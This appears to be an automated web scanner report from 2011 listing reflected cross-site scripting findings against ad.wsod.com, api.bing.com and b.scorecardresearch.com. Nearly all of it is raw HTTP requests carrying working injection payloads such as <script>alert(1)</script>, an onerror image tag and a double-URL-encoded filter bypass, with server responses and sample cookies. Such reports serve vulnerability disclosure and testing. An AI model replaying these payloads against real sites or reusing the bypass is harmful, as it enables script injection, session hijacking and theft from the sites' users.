HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:52 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
5.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9476a"-alert(1)-"985f8e3db43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&9476a"-alert(1)-"985f8e3db43=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1684
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ad74"-alert(1)-"523f8ff21d1 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=84798989ad74"-alert(1)-"523f8ff21d1&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77be7"-alert(1)-"86a6913ea5d was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015277be7"-alert(1)-"86a6913ea5d&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:34 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79400"-alert(1)-"898301abb9 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad79400"-alert(1)-"898301abb9 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a932"-alert(1)-"098c112b24 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ9a932"-alert(1)-"098c112b24&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdbb2%2522%253balert%25281%2529%252f%252fd3a2d6e4cb5 was submitted in the REST URL parameter 2. This input was echoed as bdbb2";alert(1)//d3a2d6e4cb5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357bdbb2%2522%253balert%25281%2529%252f%252fd3a2d6e4cb5/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c9b%2522%253balert%25281%2529%252f%252fe620cc65532 was submitted in the REST URL parameter 3. This input was echoed as 36c9b";alert(1)//e620cc65532 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3036c9b%2522%253balert%25281%2529%252f%252fe620cc65532/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:42:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3be94"-alert(1)-"68a9d8cb374 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534883be94"-alert(1)-"68a9d8cb374&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 734d6"-alert(1)-"39b801b9989 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G734d6"-alert(1)-"39b801b9989&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f21b"-alert(1)-"3bd3b22176f was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!5f21b"-alert(1)-"3bd3b22176f&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
5.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d2bd"-alert(1)-"c32921f3ace was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&8d2bd"-alert(1)-"c32921f3ace=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1684
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 412b0<img%20src%3da%20onerror%3dalert(1)>167ebef1169 was submitted in the q parameter. This input was echoed as 412b0<img src=a onerror=alert(1)>167ebef1169 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /qsonhs.aspx?form=MSN005&q=412b0<img%20src%3da%20onerror%3dalert(1)>167ebef1169 HTTP/1.1 Host: api.bing.com Proxy-Connection: keep-alive Referer: http://www.msn.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF
Response
HTTP/1.1 200 OK Content-Length: 79 Content-Type: application/json; charset=utf-8 X-Akamai-TestID: dc4cad0d277c4e69b70a6ff416da300c Date: Tue, 26 Apr 2011 18:36:47 GMT Connection: close
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f7a00<script>alert(1)</script>2b050c4882a was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Apr 2011 18:36:29 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 595c5<script>alert(1)</script>e3e814fd6cc was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3595c5<script>alert(1)</script>e3e814fd6cc&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:44 GMT Date: Tue, 26 Apr 2011 18:39:44 GMT Connection: close Content-Length: 1250
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 66376<script>alert(1)</script>fbc5d350fe7 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=603533866376<script>alert(1)</script>fbc5d350fe7&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:45 GMT Date: Tue, 26 Apr 2011 18:39:45 GMT Connection: close Content-Length: 1250
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload a0acc<script>alert(1)</script>2c22c5ef1fd was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!a0acc<script>alert(1)</script>2c22c5ef1fd&c4=%ECid!&c5=62431291&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:46 GMT Date: Tue, 26 Apr 2011 18:39:46 GMT Connection: close Content-Length: 1250
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... ar c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 2724d<script>alert(1)</script>ef3e74934bc was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!2724d<script>alert(1)</script>ef3e74934bc&c5=62431291&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:46 GMT Date: Tue, 26 Apr 2011 18:39:46 GMT Connection: close Content-Length: 1250
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 41c00<script>alert(1)</script>f9b5dad6c03 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=6243129141c00<script>alert(1)</script>f9b5dad6c03&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:47 GMT Date: Tue, 26 Apr 2011 18:39:47 GMT Connection: close Content-Length: 1250
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 98717<script>alert(1)</script>403ae54048e was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=98717<script>alert(1)</script>403ae54048e& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Tue, 03 May 2011 18:39:47 GMT Date: Tue, 26 Apr 2011 18:39:47 GMT Connection: close Content-Length: 1250
The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload 567db<img%20src%3da%20onerror%3dalert(1)>4321673800c was submitted in the REST URL parameter 18. This input was echoed as 567db<img src=a onerror=alert(1)>4321673800c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
